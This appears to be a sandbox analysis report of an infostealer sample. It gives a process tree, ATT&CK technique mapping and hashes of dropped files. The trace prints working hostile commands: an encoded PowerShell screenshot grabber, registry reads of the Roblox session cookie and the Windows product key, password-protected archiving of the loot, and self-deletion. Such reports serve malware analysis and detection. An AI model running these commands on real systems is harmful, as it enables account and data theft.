- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4376
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4328
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gjchv4mc\gjchv4mc.cmdline"
        5⤵
        
        PID:3852
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79E3.tmp" "c:\Users\Admin\AppData\Local\Temp\gjchv4mc\CSCB71E918426664F5A996A2E8AD45E3C6D.TMP"
        6⤵
        
        PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2488
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4844
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4264
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3452
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3576
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24722\rar.exe a -r -hp"040925" "C:\Users\Admin\AppData\Local\Temp\anl6l.zip" *"
    3⤵
    PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\_MEI24722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI24722\rar.exe a -r -hp"040925" "C:\Users\Admin\AppData\Local\Temp\anl6l.zip" *
      4⤵
      Executes dropped EXE
      PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1160
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2336
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4592

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
51fc9f46ed7a5fbec980d47049731eac

SHA1
1811612998c800bb4563742c4760b2ab3a5e2677

SHA256
16c05848744983bd75fe403c1aa3aded96c6baf10b77fe95d9f4b52d8422daac

SHA512
e55ea8fe57f30d236b3ba8cd327e53dac090bb71ef7899b536a4acccd997a6aa232d9b80e0995a536975aeb13cfe29eda27b630393683e3825660224d96b8a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
758620b2fd411c126afb74bd695fc415

SHA1
2ed48d6ca902a78e9614177118ddd1623943c27c

SHA256
1722906bf71bd3a294fe99c7669e8911fb36349d21dd7ad59f674c177b9b919a

SHA512
ec508d302185e7378841fca9b160c0d9eba54db75a45b81b9edfb8a79c0ccbac90b5416c4c81248493e47ca0548b3acd968ddb884edf60b860b8682e6649b31f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8ca0598540ca035a388384f5e17e64d

SHA1
a26b13dff62055413bf2abe83b7da9c8791629b6

SHA256
82174c2915e2cabb086dd70df0c18ed6336a68fcd1a5d35f36d59ae2f00002f9

SHA512
11223b4013bd0afa166c52dcc364e2fd2826a8027970ce1e82a8ac3f5f7d5841c126f49dfd509127a27f26c26e3a918cb8ff519927b876daf86c2b36fc3cd40b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES79E3.tmp

Filesize
1KB

MD5
9b8f4bd49d79ff2136c0a593b7232086

SHA1
0d9e36e406512ffff0fbab8f0f97e194e210738d

SHA256
a65c4e5e435a7fb6092f8aa1d7f7d6f02f69e1c9e19620039a04ff2cb1e38214

SHA512
bcc7adf9e4fa9e96495355c129244c3c6e5a242cd7de0fe8a8e0e73c5ac23380183e8821ba487ad0eb5c6ba34384f8557c4288875a27beb211485993de775d6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_bz2.pyd

Filesize
48KB

MD5
341a6188f375c6702de4f9d0e1de8c08

SHA1
204a508ca6a13eb030ed7953595e9b79b9b9ba3b

SHA256
7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e

SHA512
5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_ctypes.pyd

Filesize
58KB

MD5
ee2d4cd284d6bad4f207195bf5de727f

SHA1
781344a403bbffa0afb080942cd9459d9b05a348

SHA256
2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009

SHA512
a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_decimal.pyd

Filesize
106KB

MD5
918e513c376a52a1046c4d4aee87042d

SHA1
d54edc813f56c17700252f487ef978bde1e7f7e1

SHA256
f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29

SHA512
ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_hashlib.pyd

Filesize
35KB

MD5
6d2132108825afd85763fc3b8f612b11

SHA1
af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0

SHA256
aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52

SHA512
196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_lzma.pyd

Filesize
86KB

MD5
5eee7d45b8d89c291965a153d86592ee

SHA1
93562dcdb10bd93433c7275d991681b299f45660

SHA256
7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9

SHA512
0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_queue.pyd

Filesize
25KB

MD5
8b3ba5fb207d27eb3632486b936396a3

SHA1
5ad45b469041d88ec7fd277d84b1e2093ec7f93e

SHA256
9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051

SHA512
18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_socket.pyd

Filesize
43KB

MD5
3ea95c5c76ea27ca44b7a55f6cfdcf53

SHA1
aace156795cfb6f418b6a68a254bb4adfc2afc56

SHA256
7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923

SHA512
916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_sqlite3.pyd

Filesize
56KB

MD5
c9d6ffa3798bb5ae9f1b082d66901350

SHA1
25724fecf4369447e77283ece810def499318086

SHA256
410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec

SHA512
878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\_ssl.pyd

Filesize
65KB

MD5
936919f3509b2a913bf9e05723bc7cd2

SHA1
6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd

SHA256
efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3

SHA512
2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\base_library.zip

Filesize
1.4MB

MD5
5267307c6e36e68b2900f5a149ba46f1

SHA1
233c722ba3032c141ca0bd356ea2b309b7adfb1b

SHA256
a05d29fb602b34d0ed279f5bd57d03173003957bcfb8cd111de5a1a8241e4371

SHA512
7cb09b97ab6561b411a690435c2944de1aa1033e7253dd5aade5b727065ed87f6b993f601750a01a6970580b5cb3682eecaa6399cb8a5f223f0611100ea1aa5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\blank.aes

Filesize
127KB

MD5
5d2407033b9d318a63cc4a25ac4e093b

SHA1
fb0e0681185bc5ef6f2669f6832d0f231b079c18

SHA256
211fa2e7ba58b4a6708e7ba78a4c58931e095f64a3d3643d8a84553c36b7fa4b

SHA512
7a93ab32914bc1752ef7e5ae9db7fe145df919829b98e03109bb66208df448b94534382ea7820f3fb98e84a19de5d8e60fa79ccfb359f3855caeab07e579a131

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24722\libcrypto-3.dll

Filesize
